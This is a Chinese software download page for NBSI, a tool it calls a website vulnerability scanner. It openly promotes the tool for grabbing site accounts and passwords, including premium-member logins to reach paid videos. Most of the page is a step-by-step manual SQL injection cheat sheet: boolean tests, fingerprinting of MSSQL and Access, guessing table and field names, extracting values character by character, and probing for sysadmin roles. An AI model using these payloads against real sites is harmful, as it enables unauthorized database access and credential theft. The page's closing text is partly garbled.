U大师软件中心提供官方软件下载
您所在的位置:软件中心 »网络应用 »其他应用 »NBSI(网站漏洞检测工具)新版下载

NBSI新版下载地址直达

NBSI

NBSI(网站漏洞检测工具)是一款专业的网页漏洞扫描检测软件,界面简洁。包括网站扫描、注入分析、扫描及工具、历史记录、程序设置、隐藏等多个功能模块,操作简单,只需要载入需要注入漏洞的网站地址即可。

  • 软件别名:网站漏洞检测工具
  • 软件热度:1381
  • 软件类型:国产软件
  • 开发商:互联网
  • 软件语言:简体中文
  • 软件平台:Win
  • 软件版本:新版
  • 软件大小:951 KB
  • 授权方式:免费软件
  • 更新时间:2018-06-22 16:26:29
  • NBSI新版

    软件介绍

    NBSI(网站漏洞检测工具)是一款操作简单、功能实用的网站漏洞扫描、检测以及注入工具,由VB语言编写而成,能够版主用户快速获取网站的账号和密码,例如网站的黄金会员密码和账号,即可该网站内的所有视频资源,方便实用,功能十分强大。

    软件功能

    同时它是一款由VB语言编写的网站漏洞检测工具的名称,ASP注入漏洞检测工具,特别在SQL Server注入检测方面有极高的准确率。

    用户提交的数据过滤不足,都可能产生这个漏洞,而攻击原理就是利用用户提交或可修改的数据,把想要的SQL语句插入到系统实际SQL语句中,轻则获得敏感的信息,重则控制服务器。

    使用说明

    1.判断是否有注入

    ;and 1=1

    ;and 1=2

    2.初步判断是否是mssql

    ;and user>0

    3.判断数据库系统

    ;and (select count(*) from sysobjects)>0 mssql

    ;and (select count(*) from msysobjects)>0 access

    4.注入参数是字符

    'and [查询条件] and ''='

    5.搜索时没过滤参数的

    'and [查询条件] and '%25'='

    6.猜数据库

    ;and (Select Count(*) from [数据库名])>0

    7.猜字段

    ;and (Select Count(字段名) from 数据库名)>0

    8.猜字段中记录长度

    ;and (select top 1 len(字段名) from 数据库名)>0

    9.(1)猜字段的ascii值(access)

    ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

    (2)猜字段的ascii值(mssql)

    ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

    10.测试权限结构(mssql)

    ;and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--

    ;and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));--

    ;and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--

    ;and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--

    ;and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--

    ;and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--

    ;and 1=(SELECT IS_MEMBER('db_owner'));--

    软件评测

    NBSI(网站漏洞检测工具)的功你十分强大,操作也比较简单,能够快速对指定的URL的SQL注入漏洞,获取账号和密码。

    截图

    • NBSI 绿色版
    • NBSI 绿色版
    左箭头
    右箭头

    下载地址

    ( 0 ˲)

    ֤룺  

    热门看点

    相关文章